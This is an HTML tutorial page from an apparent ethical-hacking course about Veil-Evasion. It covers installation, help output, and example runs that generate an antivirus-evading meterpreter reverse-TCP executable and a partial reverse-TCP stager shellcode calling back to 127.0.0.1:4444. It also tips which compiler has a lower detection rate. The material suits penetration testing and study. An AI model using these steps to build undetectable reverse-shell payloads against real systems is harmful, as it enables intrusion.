<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
fieldset {
  background-color: #eeeeee;
  width: 90%; 
   font-size:14px;       
    
}
r {
  background-color: silver;
  font-size: 19px;
  width: 100%;
   }
n  {
     font-size: 20px;
     }
code {
	background-color: #eeeeee;
          }

* {
  box-sizing: border-box;
}

/* Add a gray background color with some padding */
body {
    font-family: 'Lexend Deca', sans-serif;
  padding: 20px;
  margin: 0;
        width: 100%;
        height: 20vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

img {
  max-width: 100%;
  height: auto;
}

/* Header/Blog Title */
.header {
  padding: 2px;
  font-size: xx-small;
  text-align: center;
  background: white;
  margin: 0;
        width: 100%;
        height: 15vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

@-webkit-keyframes gradientBG {
        0% {
            background-position: 0 50%
        }
        50% {
            background-position: 100% 50%
        }
        100% {
            background-position: 0 50%
        }
    }

    @keyframes gradientBG {
        0% {
            background-position: 0 50%
        }
        50% {
            background-position: 100% 50%
        }
        100% {
            background-position: 0 50%
        }
    }

/* Create two unequal columns that floats next to each other */
/* Left column */
.leftcolumn {   
  float: left;
  width: 75%;
  background: #ffffff;
}

/* Right column */
.rightcolumn {
  float: left;
  width: 25%;
  padding-left: 20px;
}

/* Fake image */
.fakeimg {
  background-color: #aaa;
  width: 100%;
  padding: 20px;
}

/* Add a card effect for articles */
.card {
   background-color: white;
   padding: 20px;
   margin-top: 20px;
}

/* Clear floats after the columns */
.row:after {
  content: "";
  display: table;
  clear: both;
}

/* Footer */
.footer {
  padding: 20px;
  text-align: center;
  background: #ddd;
  margin-top: 20px;
  margin: 0;
        width: 100%;
        height: 15vh;
        background: linear-gradient(-45deg, #ee7752, #e73c7e, #23a6d5, #23d5ab);
        background-size: 300% 200%;
        -webkit-animation: gradientBG 15s ease infinite;
        animation: gradientBG 15s ease infinite
}

.frame-area {
  display: block;
  background: #f1f1f1;
  width: 100%;  /* RESPONSIVE WIDTH */
  max-width: auto;
  height: 750px;
  overflow: hidden;  /* EDIT TO hidden FOR NO SCROLLBAR */
  border: #999999 1px solid;
  margin: 0px;
  padding: 0px;
  }


/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 800px) {
  .leftcolumn, .rightcolumn {   
    width: 100%;
    padding: 0;
  }
}
</style>
</head>
<body>

<div class="header">
  <a href="index.html"><img src="https://1.bp.blogspot.com/-tuZ2JeNu8TY/X2Gjn91qNQI/AAAAAAAAoQs/Yn_Ij5cLcp8qrFL1nPMipYGMXljXOmkBQCK4BGAYYCw/s1600/ronnie.png" class=" square responsive-img materialboxed"></a>
</div>

<div class="row">
  <div class="leftcolumn" >

<ul>


	<center><h1>Veil&ndash;Evasion</h1></center>
	<center><img src="https://1.bp.blogspot.com/-iiuyIKgpAI4/X7vw7hsgo4I/AAAAAAAApEA/sXyGUltEKAosmjHoIVmBjR4qqcIDbhSBQCLcBGAsYHQ/s0/img-veil.png" height="300" width="400"/></center>


	<p><span style="white-space: pre;">	</span>Veil&ndash;Evasion is a tool designed to generate metasploit payloads that bypass common anti&ndash;virus solutions.</p>


<h2>Software Requirements :</h2>

 <p>&emsp;<n>The following OSs are officially supported :</n></p>

<ul style="list-style-type: disc">
    <p><li> Debian 8&plus;</p>
    <p><li> Kali Linux Rolling 2018.1&plus;</p>
</ul>

 <p>&emsp;<n>The following OSs are likely able to run Veil :</n></p>
<ul style="list-style-type: disc">
    <p><li> Arch Linux</p>
    <p><li> Manjaro Linux</p>
    <p><li> BlackArch Linux</p>
    <p><li> Deepin 15&plus;</p>
    <p><li> Elementary</p>
    <p><li> Fedora 22&plus;</p>
    <p><li> Linux Mint</p>
    <p><li> Parrot Security</p>
    <p><li> Ubuntu 15.10&plus;</p>
    <p><li> Void Linux</p>
</ul>

<br>

<h2>Setup :</h2> 
	<p><h3>&emsp;Kali&#39;s Quick Install :</h3></p>

		<p>&emsp;&emsp;<code>&nbsp;apt &ndash;y install veil&nbsp;</code></p>
		<p>&emsp;&emsp;<code>&nbsp;/usr/share/veil/config/setup.sh &ndash;&ndash;force &ndash;&ndash;silent&nbsp;</code></p>
<br>

	<p><h3>&emsp;Git&#39;s Quick Install :</h3></p>

	<p><h4>&emsp;&nbsp;NOTE :</h4></p>

<ul style="list-style-type: disc">
	    <p><li> Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with <code>&nbsp;sudo&nbsp;</code> or change to the root user before beginning.</p>
    	     <p><li> Your package manager may be different to <code>&nbsp;apt&nbsp;</code>. You will also need an X server running, either on the system itself, or on your local system.</p>

		<p><code>&nbsp;sudo apt&ndash;get &ndash;y install git&nbsp;</code></p>
		<p><code>&nbsp;git clone <a href="https://github.com/Veil-Framework/Veil.git">https://github.com/Veil&ndash;Framework/Veil.git</a>&nbsp;</code></p>
		<p><code>&nbsp;cd Veil/&nbsp;</code></p>
		<p><code>&nbsp;./config/setup.sh &ndash;&ndash;force &ndash;&ndash;silent&nbsp;</code></p>
		
</ul>
<br>
	<p><h3>&emsp;./config/setup.sh // Setup Files </h3></p>

		<p><span style="white-space: pre;">	</span>This file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run <code>&nbsp;./config/update&ndash;config.py&nbsp;</code> for your environment.</p>

	<p><span style="white-space: pre;">	</span>It includes two optional flags, <code>&nbsp;&ndash;&ndash;force&nbsp;</code> and <code>&nbsp;&ndash;&ndash;silent&nbsp;</code> :</p>

<ul>
		<p><code>&nbsp;&ndash;&ndash;force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.&nbsp;</code></p>
		<p><code>&nbsp;&ndash;&ndash;silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.&nbsp;</code></p>
</ul>

	<p><span style="white-space: pre;">	</span>This can be ran either by doing: <code>&nbsp;./Veil.py &ndash;&ndash;setup&nbsp;</code> OR <code>&nbsp;./config/setup.sh &ndash;&ndash;force.&nbsp;</code></p>

<br>
	<p><h3>&emsp;./config/update&ndash;config.py // Regenerating Configuration file</h3></p>

	<p><span style="white-space: pre;">	</span>This will generate the output file for <code>&nbsp;/etc/veil/settings.py&nbsp;</code>. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).</p>

	<p><span style="white-space: pre;">	</span>It is important that you are in the <code>&nbsp;./config/&nbsp;</code> directory before executing update&ndash;config.py. If you are not, <code>&nbsp;/etc/veil/settings.py&nbsp;</code> will be incorrect and when you launch Veil you will see the following:</p>

<ol><ul><br>
 		   <p><code>&nbsp;Main Menu&nbsp;</code></p>

    		        <p><code>&emsp;&emsp;0 payloads loaded&nbsp;</code></p>
</ul></ol><br>

	<p><span style="white-space: pre;">	</span>Don&#39;t panic. Run either: <code>&nbsp;./Veil.py &ndash;&ndash;config&nbsp;</code> OR <code>&nbsp;cd ./config/; ./update&ndash;config.py.&nbsp;</code></p>

<br>

<p><h3>&emsp;Py2Exe :</h3></p>

	<p><b>&emsp;&nbsp;&nbsp;NOTE :</b> Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).</p>

	<p>&emsp;&nbsp;&nbsp;&emsp;MANUALLY Install on a Windows Computer (as this isn&#39;t done by Veil&#39;s setup) :</p>

<ul><ul style="list-style-type: disc">
	   <p><li> <a href="https://www.python.org/downloads/release/python-335/">Python 3.3</a></p>
	   <p><li> <a href="https://pypi.org/project/py2exe/">Py2Exe</p>
	   <p><li> <a href="http://www.voidspace.org.uk/python/modules.shtml#pycrypto">PyCrypto</a></p>
	   <p><li> <a href="https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/">PyWin32</a></p>
</ul></ul>

<br><br>

<h2>Example Usage :</h2> 
 <p>&nbsp;Veil&#39;s Main Menu :</p>

<fieldset>
<code>
	<p>$ ./Veil.py</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
 	                            <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Veil | [Version]: 3.1.6</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	      <p>&emsp;&emsp;&emsp;&emsp;[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	<br>
	<p>Main Menu</p>
	<br>
	  <p>&emsp;&emsp;2 tools loaded</p>
	<br>
	<p>Available Tools:</p>
	<br>
	  <p>&nbsp;&nbsp;1)  Evasion</p>
	  <p>&nbsp;&nbsp;2)  Ordnance</p>
	<br>
	<p>Available Commands:</p>
	<br>
	  <p>&nbsp;&nbsp;exit      Completely exit Veil</p>
	  <p>&nbsp;&nbsp;info      Information on a specific tool</p>
	  <p>&nbsp;&nbsp;list      List available tools</p>
	  <p>&nbsp;&nbsp;options     Show Veil configuration</p>
	  <p>&nbsp;&nbsp;update      Update Veil</p>
	  <p>&nbsp;&nbsp;use     Use a specific tool</p>
	<br>
	<p>Veil<span class="pl-k">&gt;</span>:</p>
</code>
</fieldset>

<br>
<p><strong>&nbsp;Help :</strong></p>

<fieldset>
<code>

	<p>$ ./Veil.py &ndash;&ndash;help</p>
	<p>usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[--version] [--ip IP] [--port PORT] [--list-payloads]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[-	p [PAYLOAD]] [-o OUTPUT-NAME]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[-c [OPTION=value [OPTION=value ...]]]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]</p>
	               <p>&emsp;&emsp;&emsp;&emsp;[--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]</p>
	<br>
	<p>Veil is a framework containing multiple tools.</p>
	<br>
	<p>[*] Veil Options:</p>
	  <p>&nbsp;&nbsp;--list-tools          List Veil's tools</p>
	  <p>&nbsp;&nbsp;-t TOOL, --tool TOOL  Specify Veil tool to use (Evasion, Ordnance etc.)</p>
	  <p>&nbsp;&nbsp;--update              Update the Veil framework</p>
	  <p>&nbsp;&nbsp;--setup               Run the Veil framework setup file & regenerate the</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;configuration</p>
	  <p>&nbsp;&nbsp;--config              Regenerate the Veil framework configuration file</p>
	  <p>&nbsp;&nbsp;--version             Displays version and quits</p>
	<br>
	<p>[*] Callback Settings:</p>
	  <p>&nbsp;&nbsp;--ip IP, --domain IP  IP address to connect back to</p>
	  <p>&nbsp;&nbsp;--port PORT           Port number to connect to</p>
	<br>
	<p>[*] Payload Settings:</p>
	  <p>&nbsp;&nbsp;--list-payloads       Lists all available payloads for that tool</p>
	<br>
	<p>[*] Veil-Evasion Options:</p>
	  <p>&nbsp;&nbsp;-p [PAYLOAD]          Payload to generate</p>
	  <p>&nbsp;&nbsp;-o OUTPUT-NAME        Output file base name for source and compiled binaries</p>
	  <p>&nbsp;&nbsp;-c [OPTION=value [OPTION=value ...]]</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Custom payload module options</p>
	  <p>&nbsp;&nbsp;--msfoptions [OPTION=value [OPTION=value ...]]</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Options for the specified metasploit payload</p>
	  <p>&nbsp;&nbsp;--msfvenom []         Metasploit shellcode to generate (e.g.</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;windows/meterpreter /reverse_tcp etc.)</p>
		  <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;--compiler pyinstaller</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Compiler option for payload (currently only needed for</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Python)</p>
	  <p>&nbsp;&nbsp;--clean               Clean out payload folders</p>
	<br>
	<p>[*] Veil-Ordnance Shellcode Options:</p>
	  <p>&nbsp;&nbsp;--ordnance-payload PAYLOAD</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Payload type (bind_tcp, rev_tcp, etc.)</p>
	<br>
		<p>&emsp;&emsp;&emsp;&emsp;&emsp;[*] Veil-Ordnance Encoder Options:</p>
	  <p>&nbsp;&nbsp;--list-encoders       Lists all available encoders</p>
	  <p>&nbsp;&nbsp;-e ENCODER, --encoder ENCODER</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Name of shellcode encoder to use</p>
	  <p>&nbsp;&nbsp;-b \x00\x0a.., --bad-chars \x00\x0a..</p>
	                        <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Bad characters to avoid</p>
	  <p>&nbsp;&nbsp;--print-stats         Print information about the encoded shellcode</p>
	<p><span class="pl-s">$</span></p>
</code>	
</fieldset>

<br>	
<p><strong>&nbsp;Veil Evasion CLI :</strong></p>

<fieldset>		
<code>
	
		<p>&emsp;&emsp;$ ./Veil.py &ndash;t Evasion &ndash;p go/meterpreter/rev_tcp.py &ndash;&ndash;ip 127.0.0.1 &ndash;&ndash;port 4444</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	                                   <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Veil-Evasion</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	      <p>&emsp;&emsp;[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	<br>
	<p>runtime/internal/sys</p>
	<p>runtime/internal/atomic</p>
	<p>runtime</p>
	<p>errors</p>
	<p>internal/race</p>
	<p>sync/atomic</p>
	<p>math</p>
	<p>sync</p>	
	<p>io</p>
	<p>unicode/utf8</p>
	<p>internal/syscall/ windows/sysdll</p>
	<p>unicode/utf16</p>
	<p>syscall</p>
	<p>strconv</p>
	<p>reflect</p>
	<p>encoding/binary</p>
	<p>command-line-arguments</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	                                   <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Veil-Evasion</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	      <p>&emsp;&emsp;[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	<br>
	 <p>&nbsp;[*] Language: go</p>
	 <p>&nbsp;[*] Payload Module: go/meterpreter/rev_tcp</p>
	 <p>&nbsp;[*] Executable written to: /var/lib/veil/output/ compiled/payload.exe</p>
	 <p>&nbsp;[*] Source code written to: /var/lib/veil/output/ source/payload.go</p>
	 <p>&nbsp;[*] Metasploit Resource file written to: /var/lib/veil/output/ handlers/payload.rc</p>
	<p>$</p>
	<p>$ file /var/lib/veil/output/ compiled/payload.exe</p>
	<p>/var/lib/veil/output/ compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), <span class="pl-k">for</span> MS Windows</p>
	<p>$</p>
	
</code>
</fieldset>

<br>
 <p><strong>&nbsp;Veil Ordnance CLI</strong></p>
<fieldset>
<code>

	<p>$ ./Veil.py &ndash;t Ordnance &ndash;&ndash;ordnance&ndash;payload rev_tcp &ndash;&ndash;ip 127.0.0.1 &ndash;&ndash;port 4444</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	                                   <p>&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;&emsp;Veil-Ordnance</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	      <p>&emsp;&emsp;[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework</p>
	<p>======= ======= ======== ========= ======== ======== ======= ========== ========</p>
	<br>
	 <p>&nbsp;[*] Payload Name: Reverse TCP Stager (Stage 1)</p>
	 <p>&nbsp;[*] IP Address: 127.0.0.1</p>
	 <p>&nbsp;[*] Port: 4444
	 <p>&nbsp;[*] Shellcode Size: 287
	<br>
	<p>\xfc\xe8\x86\x00\x00\ x00\x60\x89\xe5\ x31\xd2\x64\ x8b\x52\x30\x8b \x52\x0c\x8b\x52 \x14\x8b\x72 \x28\x0f\xb7\ x4a\x26\x31\ xff</p>
	<p>$</p>

</code>
</fieldset>

<br><br>

<p><n>If you want some information about How to Evade AV Detection with Veil&ndash;Evasion :</n> <a href="https://null-byte.wonderhowto.com/how-to/hack-like-pro-evade-av-detection-with-veil-evasion-0162363/"><n>Click Here</n></a></p>
<br>
<p><n>If you want Video about Veil&ndash;Evasion &ndash; How To Generate Undetectable Payloads | Antivirus Bypass :</n> <a href="https://youtu.be/iz1twCSJZyo"><n>Click Here</n></a></p>

<br><br>
Source : <a href="https://github.com/Veil-Framework/Veil">github.com</a>




</ul>
	
    
  </div>
  
  <div class="rightcolumn">
    <div class="card">
      <h2>About us</h2>
      <p>free ethical hacking course for an enthusiast to learn ethical hacking from begginner to intermediate, By <a href="https://techdogie.blogspot.com/">Techdogie</a> team.</p>
    </div>
    <div class="card">
      <h3>Follow us</h3>
      <p><a href="https://techdogie.blogspot.com/">Techdogie</a></p>
    </div>
  </div>
</div>
<div class="footer">
  <h2> <a href="index.html">Home</a></h2>
</div>
</body>
</html>